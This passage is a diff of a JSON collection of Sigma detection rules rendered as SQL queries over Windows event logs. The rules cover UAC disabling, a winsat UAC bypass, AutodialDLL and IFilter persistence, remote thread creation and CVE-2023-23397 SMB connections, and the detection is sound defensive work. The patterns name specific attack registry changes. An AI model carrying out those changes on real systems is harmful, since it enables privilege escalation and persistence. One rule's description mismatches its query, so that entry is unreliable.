'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\ServiceDll' ESCAPE '\\' AND NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (SourceImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR SourceImage LIKE '%unknown process%' ESCAPE '\\' OR StartFunction = 'EtwpNotificationThread'))" ], - "filename": "registry_set_servicedll_hijack.yml" + "filename": "create_remote_thread_win_susp_remote_thread_target.yml" }, { - "title": "Running 
Chrome VPN Extensions via the Registry 2 VPN Extension", - "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "title": "Remote Thread Creation Via PowerShell", + "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", "status": "test", - "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", - "author": "frack113", + "description": "Detects the creation of a remote thread from a Powershell process to another process", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1133" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE 
'%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' 
ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE 
'%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' 
ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" ], - "filename": "registry_set_chrome_extension.yml" + "filename": "create_remote_thread_win_powershell_crt.yml" }, { - "title": "Disable UAC Using Registry", - "id": "48437c39-9e5f-47fb-af95-3d663c3f2919", - "status": "experimental", - "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", - "author": "frack113", + "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", + "id": "cbe51394-cd93-4473-b555-edf0144952d9", + "status": "test", + "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1548.002" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 
'DNS Server' AND EventID IN ('150', '770', '771'))" ], - "filename": "registry_set_disable_uac_registry.yml" + "filename": "win_dns_server_susp_server_level_plugin_dll.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", - "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", + "title": "Unsigned Binary Loaded From Suspicious Location", + "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "status": "experimental", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", - "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path 
parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Microsoft Defender Blocked from Loading Unsigned DLL", + "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "status": "experimental", + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND NewValue LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" ], - "filename": "registry_set_uac_bypass_winsat.yml" + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" }, { - "title": "Potential Persistence Via AutodialDLL", - "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "title": "Standard User In High Privileged Group", + "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", "status": "experimental", - "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", + "author": "frack113", "tags": [ - "attack.persistence" + 
"attack.credential_access", + "attack.privilege_escalation" ], "falsepositives": [ - "Unlikely" + "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_autodial_dll.yml" + "filename": "win_lsa_server_normal_user_admin.yml" }, { - "title": "Potential Attachment Manager Settings Attachments Tamper", - "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "title": "Sysinternals Tools AppX Versions Execution", + "id": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "description": "Detects execution of Sysinternals tools via an AppX package. 
Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Legitimate usage of the applications from the Windows Store" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppModel-Runtime/Admin' AND EventID = '201' AND ImageName IN ('procdump.exe', 'psloglist.exe', 'psexec.exe', 'livekd.exe', 'ADExplorer.exe'))" ], - "filename": "registry_set_policies_attachments_tamper.yml" + "filename": "win_appmodel_runtime_sysinternals_tools_appx_execution.yml" }, { - "title": "Potential PendingFileRenameOperations Tamper", - "id": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", - "status": "experimental", - "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot.", - "author": "frack113", + "title": "Suspicious Rejected SMB Guest Logon From IP", + "id": "71886b70-d7b4-4dbf-acce-87d2ca135262", + "status": "test", + "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", + "author": "Florian Roth 
(Nextron Systems), KevTheHermit, fuzzyf10w", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.credential_access", + "attack.t1110.001" ], "falsepositives": [ - "Installers and updaters may set currently in use files for rename after a reboot." + "Account fallback reasons (after failed login with specific account)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\PendingFileRenameOperations%' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-SmbClient/Security' AND EventID = '31017' AND UserName = '' AND ServerName LIKE '\\\\1%' ESCAPE '\\')" ], - "filename": "registry_set_susp_pendingfilerenameoperations.yml" + "filename": "win_smbclient_security_susp_failed_guest_logon.yml" }, { - "title": "Register New IFiltre For Persistence", - "id": "b23818c7-e575-4d13-8012-332075ec0a2b", + "title": "Potential CVE-2023-23397 Exploitation Attempt - SMB", + "id": "de96b824-02b0-4241-9356-7e9b47f04bac", "status": "experimental", - "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", + "description": "Detects (failed) outbound connection attempts to internet facing SMB servers. 
This could be a sign of potential exploitation attempts of CVE-2023-23397.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.exfiltration", + "cve.2023.23397" ], "falsepositives": [ - "Legitimate registration of IFilters by the OS or software" + "Some false positives may occur from external trusted servers. Apply additional filters accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentHandler%' ESCAPE '\\') OR (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentAddinsRegistered\\\\{89BCB740-6119-101A-BCB7-00DD010655AF}%' ESCAPE '\\')) AND NOT (((TargetObject LIKE '%\\\\CLSID\\\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{4887767F-7ADC-4983-B576-88FB643D6F79}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\CLSID\\\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{9694E38A-E081-46ac-99A0-8743C909ACB6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{98de59a0-d175-11cd-a7bd-00006b827d94}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{B4132098-7A03-423D-9463-163CB07C151F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{d044309b-5da6-4633-b085-4ed02522e5a5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D169C14A-5148-4322-92C8-754FC9D018D8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{DD75716E-B42E-4978-BB60-1497B92E30C4}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E772CEB3-E203-4828-ADF1-765713D981B8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{eec97550-47a9-11cf-b952-00aa0051fe20}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID IN ('30803', 
'30804', '30806') AND NOT (((ServerAddress LIKE '10.%' ESCAPE '\\' OR ServerAddress LIKE '192.168.%' ESCAPE '\\' OR ServerAddress LIKE '172.16.%' ESCAPE '\\' OR ServerAddress LIKE '172.17.%' ESCAPE '\\' OR ServerAddress LIKE '172.18.%' ESCAPE '\\' OR ServerAddress LIKE '172.19.%' ESCAPE '\\' OR ServerAddress LIKE '172.20.%' ESCAPE '\\' OR ServerAddress LIKE '172.21.%' ESCAPE '\\' OR ServerAddress LIKE '172.22.%' ESCAPE '\\' OR ServerAddress LIKE '172.23.%' ESCAPE '\\' OR ServerAddress LIKE '172.24.%' ESCAPE '\\' OR ServerAddress LIKE '172.25.%' ESCAPE '\\' OR ServerAddress LIKE '172.26.%' ESCAPE '\\' OR ServerAddress LIKE '172.27.%' ESCAPE '\\' OR ServerAddress LIKE '172.28.%' ESCAPE '\\' OR ServerAddress LIKE '172.29.%' ESCAPE '\\' OR ServerAddress LIKE '172.30.%' ESCAPE '\\' OR ServerAddress LIKE '172.31.%' ESCAPE '\\' OR ServerAddress LIKE '127.%' ESCAPE '\\' OR ServerAddress LIKE '169.254.%' ESCAPE '\\'))))" ], - "filename": "registry_set_persistence_ifilter.yml" + "filename": "win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml" }, { - "title": "Lsass Full Dump Request Via DumpType Registry Settings", - "id": 